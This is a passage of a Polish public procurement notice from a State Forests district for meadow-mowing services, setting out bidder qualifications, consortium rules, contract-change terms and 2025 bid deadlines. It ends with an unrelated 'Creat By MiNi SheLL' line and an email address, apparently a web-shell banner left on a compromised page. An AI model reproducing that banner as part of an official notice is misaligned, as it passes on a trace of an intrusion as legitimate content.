części przedmiotu umowy), na podstawie jednej lub większej ilości umów, usługi z zakresu przedmiotu zamówienia o łącznej wartości nie mniejszej niż 45 000,00 zł brutto polegające na wykonywaniu prac obejmujących koszenie łąk, przy czym: (a) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z takich Wykonawców powinien wykazać usługi z zakresu przedmiotu zamówienia o wartości stanowiącej co najmniej 50% łącznej wartości usług wymaganej w treści niniejszego warunku, (b) w przypadku polegania na doświadczeniu podmiotów udostępniających zasoby, co najmniej jeden z takich podmiotów lub Wykonawca (a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - co najmniej jeden z takich Wykonawców) powinien wykazać usługi z zakresu przedmiotu zamówienia o wartości stanowiącej co najmniej 50% łącznej wartości usług wymaganej w treści niniejszego warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/>złożenia dokumentów potwierdzających brak podstaw do wykluczenia. Zamawiający uzna, że nie zachodzą podstawy wykluczenia<br/>na podstawie wstępnego oświadczenia Wykonawcy składanego wraz z ofertą i stanowiącego załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat (wstecz od dnia w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju wykonanych usług), dat wykonania (dat dziennych rozpoczęcia i zakończenia realizacji usług) i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie (wzór wykazu wykonanych usług stanowi Załącznik nr 6 do SWZ). <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami wykaz, o którym mowa wyżej dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <br/>b)	dowodów określających, czy wskazane przez Wykonawcę w wykazie usługi na potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane lub są wykonywane należycie. <br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (wstecz od dnia, w którym upływa termin składania ofert).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w Formularzu Oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP (tj. oświadczenie o spełnieniu warunków udziału w postępowaniu (wg wzoru stanowiącego załącznik nr 5 do SWZ) oraz o braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 4 do SWZ) składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>4) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>5) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>6) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna;<br/>7) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym zgodnie z art. 117 ust. 4 PZP Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór stosownego oświadczenia został zawarty w Formularzu Oferty (stanowiącym Załącznik nr 1 do SWZ) i Zamawiający zaleca złożyć to<br/>oświadczenie właśnie w tym Formularzu. Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP odnosi się również do Wykonawców, prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, na podstawie art. 455 ust. 1 pkt 1 PZP, przewiduje możliwość zmian postanowień Umowy w stosunku do<br/>treści Oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności<br/>wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:<br/>1) Zamawiający dopuszcza możliwość przedłużenia okresu realizacji Przedmiotu Umowy o okres odpowiadający okresowi<br/>trwania przeszkody uniemożliwiającej realizację Przedmiotu Umowy lub o okres niezbędny do wykonania Przedmiotu<br/>Umowy w minimalnym zakresie deklarowanym przez Zamawiającego w § 1 ust. 4 Umowy, jeżeli w trakcie realizacji Umowy<br/>wystąpią okoliczności uniemożliwiające realizację jej przedmiotu zgodnie z warunkami opisanymi w Umowie, za które<br/>odpowiedzialności nie ponosi Wykonawca, ani Zamawiający.<br/>2) Zamawiający dopuszcza wprowadzenie zmian w sposobie wykonywania (technologii) Przedmiotu Umowy, w przypadku,<br/>gdy wystąpi co najmniej jedna<br/>z poniższych sytuacji:<br/>a) gdy zmiana technologii umożliwiłaby Wykonawcy terminową lub należytą realizację zobowiązań wynikających z Umowy, z<br/>zastrzeżeniem, że zmiana technologii nie będzie powodować wzrostu kosztów ponoszonych na realizację Przedmiotu<br/>Umowy;<br/>b) konieczność zrealizowania Przedmiotu Umowy przy zastosowaniu innych technologii niż wskazane w Opisie Przedmiotu<br/>Zamówienia w szczególności w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub<br/>wadliwym wykonaniem Przedmiotu Umowy albo naruszało obowiązujące przepisy prawa;<br/>c) konieczność zrealizowania Przedmiotu Umowy przy zastosowaniu innych technologii albo innymi środkami ze względu na<br/>zmiany obowiązującego prawa lub regulacji obowiązujących w Państwowym Gospodarstwie Leśnym Lasy Państwowe;<br/>d) pojawienie się nowszych technologii wykonania prac gwarantujących co najmniej ten sam standard wykonania czynności<br/>wchodzących w skład Przedmiotu Umowy oraz niepowodujących większych strat i zanieczyszczeń w środowisku<br/>naturalnym niż te, które mogą powstać przy wykonywaniu Przedmiotu Umowy w sposób pierwotnie opisany.<br/>Żadna ze zmian wskazanych w lit. a) – d) nie może pociągnąć za sobą zwiększenia wynagrodzenia należnego Wykonawcy.<br/>3) Zamawiający dopuszcza możliwość zmian wskazanych w SWZ ilości prac wchodzących w zakres Przedmiotu Umowy w<br/>przypadku:<br/>a) wystąpienia konieczności zwiększenia zakresu rzeczowego usług stanowiących przedmiot zamówienia w następstwie<br/>przyczyn przyrodniczych, klimatycznych, atmosferycznych bądź związanych z prawidłowym prowadzeniem gospodarki<br/>łąkowo-rolnej lub gospodarki leśnej,<br/>b) braku możliwości wyłonienia z przyczyn obiektywnych wykonawców usług z zakresu gospodarki łąkowo-rolnej w ramach<br/>podstawowych trybów udzielania zamówień, celem zabezpieczenia niezbędnego wykonawstwa prac (na Obszarze<br/>Realizacji),<br/>c) powierzania Wykonawcy prac stanowiących wykonawstwo zastępcze w stosunku do prac realizowanych przez innego<br/>wykonawcę (na Obszarze Realizacji)<br/>przy czym zmiana ta nastąpi na następujących zasadach:<br/>- zwiększenie ilości prac w stosunku do ilości wskazanej w SWZ może nastąpić tylko pod warunkiem jednoczesnego<br/>zmniejszenia ilości innych prac w stosunku do ich ilości wskazanej w SWZ;<br/>- zwiększenie ilości prac może nastąpić o wielkość stanowiącą równowartość prac objętych zmniejszeniem;<br/>- na potrzeby określenia zakresu zmiany Umowy: (1) równowartość prac objętych zmniejszeniem oraz (2) ilość prac objętych<br/>zwiększeniem zostaną obliczone w oparciu o Ceny Jednostkowe bez uwzględniania ewentualnej Waloryzacji;<br/>- zmiana, o której mowa w niniejszym pkt nie może prowadzić do zwiększenia kwoty Wartości Przedmiotu Umowy;<br/>dalsze warunki i zakres ewentualnych zmian zmierzające do zmiany umowy opisano w Sekcji IX <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_browsk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Cd. pkt 7.4. ogłoszenia o zamówieniu - dalsze warunki i zakres ewentualnych zmian zmierzające do zmiany umowy:<br/>4) Zamawiający dopuszcza wprowadzenie zmian części Przedmiotu Umowy, które Wykonawca przewidział do realizacji za<br/>pomocą podwykonawców na inne części Przedmiotu Umowy, w tym również na części, których Wykonawca nie wskazał w<br/>złożonej przez siebie ofercie. Zmiana nie może pociągnąć za sobą zwiększenia wynagrodzenia należnego Wykonawcy.<br/>5) Zamawiający dopuszcza zmianę w zakresie treści dokumentów przedstawianych wzajemnie przez Strony w trakcie<br/>realizacji Umowy lub sposobu informowania o realizacji Umowy. Zmiana ta nie może spowodować braku informacji<br/>niezbędnych Zamawiającemu do prawidłowej realizacji Umowy.<br/>6) Ponadto Zamawiający dopuszcza wprowadzenie zmian w przypadku:<br/>a) wystąpienia siły wyższej, co uniemożliwia wykonanie co najmniej części Przedmiotu Umowy zgodnie z SWZ;<br/>b) rezygnacji przez Zamawiającego z realizacji części Przedmiotu Umowy ponad zakres wskazany § 1 ust. 4. w związku z<br/>wystąpieniem przyczyn przyrodniczych, klimatycznych, atmosferycznych bądź związanych z prawidłowym prowadzeniem<br/>gospodarki leśnej.<br/>W takim przypadku może zostać zmniejszony zakres Przedmiotu Umowy, a wynagrodzenie przysługujące Wykonawcy<br/>zostanie pomniejszone w oparciu o Ceny Jednostkowe przy czym Zamawiający zapłaci wynagrodzenie za wszystkie<br/>odebrane świadczenia.<br/>2. Wystąpienie którejkolwiek z okoliczności wskazanych w ust. 1 nie stanowi zobowiązania Stron do wprowadzenia zmiany.<br/>3. Strony potwierdzają sobie wzajemnie, iż podstawą określenia zmiany, o której mowa w art. 455 ust. 2 PZP jest Wartość<br/>Przedmiotu Umowy z dnia zawarcia Umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com